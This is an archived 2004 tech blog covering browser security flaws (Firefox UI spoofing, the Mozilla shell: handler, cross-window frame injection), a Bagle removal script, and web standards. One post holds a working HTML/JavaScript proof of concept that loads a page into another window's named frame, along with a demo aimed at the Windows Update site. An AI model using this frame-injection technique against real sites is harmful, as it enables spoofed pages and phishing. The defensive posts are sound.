Archive for July 2004

I’m valid!

I went through and converted my old Blogger template to use CSS instead of tables a while back. I basically just changed each individual item from the old method to the new, standard method. I had some minor issues with it, and it was still pretty cluttered.

So the other day I went through and rewrote the template from scratch. Excluding the Blogger-specific include tags, my template file validates as XHTML 1.0 Strict. It looks almost exactly like the original (some changes I actually prefer, but could do like the original). I’m rather proud of that, considering how it started out, and the fact that I never learned CSS proper.

The template itself is much simpler now. Rather than having odd things nested all over the place, the document is structured more clearly with less stuff mixed in. The external stylesheet means I can change the layout much more easily, and add alternate options. The whole page should be much easier to maintain now.

I’m having some issues with PHP includes, and some of my posts aren’t valid individually, so invisibill.net itself doesn’t validate, but I know exactly where the problems are, and they’re very minor. But the base template for the page is valid!

Valid XHTML 1.0

Firefox security bug

A new major security issue has been found in Firefox. In short, web pages can use the same interface widgets that the browser’s own UI is built from. With some fancy coding, a site can assemble those components into a spoofed browser window, complete with any chrome it likes (the secure padlock icon, the certificate details dialog, and so on). Rather than setting up a real SSL site that merely resembles a legitimate one, an attacker can use the UI objects to draw a window that looks like it.

http://www.nd.edu/~jsmith30/xul/test/spoof.html has details. The biggest limit on this spoof is that the site has no way of knowing what your current preferences are. The attacker can make the fake window look like the default configuration (which most people probably never change), but he has no way to copy your exact setup. If you have some of the advanced JavaScript options (the window-manipulation permissions) disabled, that interferes with the spoof and the fake window will look not quite right.

Until this is fixed, the best defence is to stop JavaScript from hiding the status bar. The setting is at Tools | Options | Web Features | Advanced, where you uncheck “Hide the status bar”. With that permission removed, the real status bar stays visible at the bottom of the attacker’s window, with his spoofed status bar sitting above it, which gives the game away. Unfortunately, that’s about the only reliable way to tell a spoofed window from a real one right now. I suggest turning it off anyway; it means the status information is always on screen for the current window.

http://secunia.com/advisories/12188/ is the Secunia bulletin. http://bugzilla.mozilla.org/show_bug.cgi?id=244965 and http://bugzilla.mozilla.org/show_bug.cgi?id=252198 are applicable bug listings.

System Administrator Appreciation Day

Tomorrow is the fifth annual System Administrator Appreciation Day. Check out http://www.sysadminday.com/ to make sure you haven’t missed any sysadmins, then thank them for doing techie stuff so you don’t have to.

Bagle.af/ag/ai removal file

I’m back to my old tricks again. I modified my old Bagle removal scripts to handle the new ones (.af, .ag, and .ai).

http://files.invisibill.net/unbagle.af.ag.ai.inf will remove the registry entries that run the program on startup and the file called by that registry entry. The descriptions I’ve read say that they create other files which contain some of the code. This script will not remove those files, or any of the copies spread via network shares. However, it will delete the startup calls, and the direct targets of those calls (if not in use). After running this script, immediately rebooting should give you a system without Bagle running. You will still need to clean the other files with a virus scanner, but this script should at least keep the viruses from running constantly, which is helpful because they try to shut down firewall and AV programs that are running.

Just save the file somewhere convenient, then right-click and choose Install. If you don’t trust me for whatever reason, you can open the script with any text editor and see that it just tries to delete three registry entries and three files. Once you’ve “installed” it, reboot. Your machine will still have virus-related files on it, but they shouldn’t autorun after you reboot, allowing you to more easily clean your system.

ESPN blurb about upgrading your browser and stuff

I found http://espn.go.com/browserupgrade_long.html#longanswer today. It does a pretty good job of explaining the concepts behind web standards.

We’d like to make perfectly clear that we are not trying to get you to use Microsoft browsers, Netscape browsers, Apple browsers, or Opera browsers. This is not about telling you what brand of browser to use. It is only about alerting you to the fact that each of the companies above, plus a few more, makes a modern, standards-compliant browser which you can easily (and freely) switch to using the links on the upper left side of this page.

I’m in that same boat as far as coding and stuff. I don’t care what you use, so long as it’s something that supports modern standards. I personally like Firefox, as I’m sure you’ve noticed by now. I could also call them on the standards support in Microsoft’s browser, but the main stuff is mostly right, enough that a modern version of IE should make the page look presentable at least. As sites start to use the newer standard code (just like the link says), I think people will see for themselves the shortcomings in IE and other browsers. Either they’ll complain enough to get the browser fixed, or they’ll switch to another browser that doesn’t have that problem.

Anyway, just thought this was a good explanation for non-techies…

Security flaw in Mozilla browsers

http://www.eweek.com/article2/0%2C1759%2C1621438%2C00.asp

Current versions of Mozilla and Firefox pass URLs whose scheme they don’t handle themselves to the operating system shell. With the shell: scheme (a Windows shell URI handler), the location passed along can be the name of a program, and the shell runs it.

In short, Mozilla hands the unrecognised URL to the OS to deal with, and the OS launches the named program with no warning or prompt.

http://www.mozillazine.org/talkback.html?article=4960 has information about new releases of Firefox, Thunderbird, and Mozilla that fix this problem by disabling calls to the shell: scheme. If you don’t want to upgrade, you can manually turn off shell: calls.

  1. Type about:config in the URL bar.
  2. Filter for network.protocol-handler.external.shell. If the preference already exists, double-click it to toggle it to false, and you’re done.
  3. Otherwise, right-click and select New -> Boolean.
  4. Enter network.protocol-handler.external.shell as the preference name, then false as the value.

If you’re not comfortable doing that manually, the MozillaZine link above has an XPI installer to change the default preference for you. Once you’ve installed the XPI, you can use about:config and filter for network.protocol-handler.external.shell to make sure the value is properly set to false.

Frames vuln in many browsers

The IE vulnerability I mentioned is actually present in many browsers, including Mozilla and Opera. http://secunia.com/advisories/11978/ has details. Since Windows Update will only work with IE, my demo won’t work on these other browsers. Use the Secunia demo or this new one I made up. It’s the first site I found on Google searching for frames.htm - http://www.isp.state.il.us/sor/frames.htm. Click that to open it in a new window. Once that’s open, come back here and inject invisibill.net into the other window. Good fun!

I just wanted to post this update so that people didn’t think I was purposely trying to hide the fact that other browsers have this bug also…

New vulnerability found in IE 5.01-6.0

Well, it’s newly discovered, but it’s a six-year-old bug… http://secunia.com/advisories/11966/ Basically, IE resolves a link’s target frame by name alone, without checking which window that frame actually belongs to, so a page in window #1 can load content into a named frame in window #2. This has been verified on a fully patched WinXP/IE6.

Here’s an example. www.windowsupdate.com will open in a new window. Once that’s loaded, come back here and inject invisibill.net into Windows Update. Switch back to the Windows Update window, and tell me what you see.

Now imagine if I had used a fake updates page linked to spambots and keyloggers instead of my obviously-not-WindowsUpdate page… It seems like no matter how many major IE bugs get fixed, there’s always another one coming up…
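The demo from this post and from the cross-browser update above, rebuilt as an added self-contained check (this is not the original demo page, nor Secunia’s): one HTML file plays both the victim window, with a frame named mainContent standing in for Windows Update, and the attacker window, which tries to navigate that frame by name alone, the same thing an <a target="mainContent"> link does. The frame name, the role query parameter and the VICTIM_URL constant are made up for the demo.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Frame injection self-check</title>
</head>
<body>
<p id="msg">Loading...</p>
<script>
// Added example, not the demo from the original post. One file plays every part:
//   (no role)       the ATTACKER window, with two buttons
//   ?role=victim    the VICTIM window, holding a frame named "mainContent"
//   ?role=payload   the marker page the attacker tries to load INTO that frame
// The frame name, the role parameter and VICTIM_URL are all made up for this demo.
var VICTIM_URL = location.pathname + '?role=victim';   // point at another origin to test cross-origin
var m = /[?&]role=(\w+)/.exec(location.search);
var role = m ? m[1] : 'attacker';
var msg = document.getElementById('msg');

if (role === 'victim') {
  msg.textContent = 'VICTIM window: the frame below is named "mainContent" and should stay blank.';
  var frame = document.createElement('iframe');
  frame.name = 'mainContent';           // the name the attacker only has to guess
  frame.src = 'about:blank';
  frame.width = '600';
  frame.height = '150';
  frame.style.border = '2px solid green';
  document.body.appendChild(frame);
} else if (role === 'payload') {
  document.body.style.background = '#fcc';
  msg.textContent = 'INJECTED: this page was loaded here by a different window.';
} else {
  msg.textContent = 'ATTACKER window.';
  var openBtn = document.createElement('button');
  openBtn.textContent = '1. Open the victim window';
  openBtn.onclick = function () {
    window.open(VICTIM_URL, 'victimTopLevel');
  };
  var injectBtn = document.createElement('button');
  injectBtn.textContent = '2. Inject into its frame by name';
  injectBtn.onclick = function () {
    // The whole trick: navigate a target chosen by NAME only, with no
    // reference to the other window, exactly as <a target="mainContent"> does.
    var w = window.open(location.pathname + '?role=payload', 'mainContent');
    var result = document.createElement('p');
    if (!w) {
      result.textContent = 'Popup blocked; allow popups for this page and retry.';
    } else if (w.top !== w) {
      // w.top and object identity are readable even cross-origin. A nested
      // target means the name resolved to the victim's frame: the 2004 behaviour.
      result.textContent = 'Payload landed inside another window\'s frame: VULNERABLE';
    } else {
      // A fresh top-level window means the lookup stayed within our own window.
      result.textContent = 'Payload opened in a new top-level window: lookup was contained';
    }
    document.body.appendChild(result);
  };
  document.body.appendChild(openBtn);
  document.body.appendChild(injectBtn);
}
</script>
</body>
</html>
```

Open the file in a browser, click button 1, then button 2. Served from a single origin, the two windows are same-origin and the name is allowed to resolve across them by design, so the check reports the injection as successful in any browser; to exercise the cross-origin case the advisories describe, serve a second copy from a different origin (another local port, for instance) and point VICTIM_URL at it. A browser with the 2004 behaviour still loads the payload into the other window’s frame; a fixed one opens a new top-level window instead.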

Internet Explorer Too Risky

Business Week Online - Internet Explorer Is Just Too Risky

In late June, network security experts saw one of their worst fears realized. Attackers exploited a pair of known but unpatched flaws in Microsoft’s Web server software and Internet Explorer browser to compromise seemingly safe Web sites. People who browsed there on Windows computers got infected with malicious code without downloading anything.

I’ve been growing increasingly concerned about IE’s endless security problems, and this episode has convinced me that the program is simply too dangerous for routine use.

eWeek - Internet Explorer Is Too Dangerous to Keep Using

In the few days that the sites provided the Trojan horses, hundreds of thousands or millions of users could have had their credit-card, stock-brokerage and bank-account numbers and passwords stolen.

Let me repeat myself: Millions of you may have every bit of your browser-driven online financial security information stolen.

Maybe this was just another massive Internet security prank. Maybe all that will happen is a DDoS attack. Well, you can hope that’s all there is to it and continue to use IE. But as for me, I’m done with it.

Use whatever browser you wish. You know my feelings on the subject by now.

Stop and think about what every security professional already knows. Once an unknown program has been installed on a system, the only true way to be totally safe is to wipe the whole system and start over. It sounds extreme, but you don’t know what the program can do. There are ways to limit what a program can do, but on most home PCs those measures aren’t in place (because they also make the machine harder to use legitimately). Perhaps it rewrote system files, so that now everything you type is sent to the author. Even if you don’t do any financial stuff online, it could log the account numbers you type into your spreadsheet or financial program. “But my firewall will stop it!” If it could get into your system files, I guarantee it could modify your firewall’s files as well. In general, your overlapping security systems (you do have at least one firewall and anti-virus, right?) should detect problems before they do damage, but that’s not always possible. If one of these malicious programs wanted to be really devastating, it could rewrite itself after doing its dirty deeds, so that when the final version was analyzed it would appear harmless (or at least less harmful), hiding the true damage.

http://webstandards.org/buzz/archive/2004_06.html#a000366

There is no question in my mind that the consumer has far more power than we poor schmucks fighting for Web standards. With coverage like this, we can help facilitate a more important revolution: Get people to use well-built software and let the losers dig their own graves.

Get people to use well-built software and let the losers dig their own graves. That about sums it up for me.